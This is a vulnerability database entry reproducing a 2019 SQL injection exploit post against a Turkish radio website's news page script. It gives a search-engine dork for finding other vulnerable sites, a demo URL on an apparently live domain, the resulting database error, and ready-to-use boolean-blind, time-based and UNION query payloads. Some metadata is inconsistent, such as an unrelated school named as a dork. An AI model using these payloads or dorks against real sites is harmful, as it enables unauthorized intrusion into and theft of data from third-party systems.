Turkish Radio Web Page SQL Injection - CXSecurity.com

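Vulnerability ID: 1605783    Vulnerability type:
Published: 2019-05-12    Updated: 2019-05-12
CVE ID: N/A    CNNVD-ID: N/A
Affected platform: N/A    CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019050134
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit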
Exploit Title : 
# Author [ Discovered By ] : Prototyqe - furkan Özer
# Team : Cyberizm Digital Security Army
# Date : 10/05/2019
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Mary Rose School Hong Kong
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

# Dork : inurl:"haberoku.php?id=" intext:"radyo"

Demo web page : 

http://www.radyoumut.co.uk/haberoku.php?id=123'

SQL vulnerability : 


Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/hisarfm/public_html/haberoku.php on line 117



/haberoku.php?id=[SQL Injection]

Payload :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=133 AND 8825=8825

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=133 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=133 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7a71,0x7758786552774d4847497458736653556d4e415842494f74476d525a5449577a7057447156465270,0x7170787671),NULL,NULL,NULL,NULL,NULL,NULL-- ZLin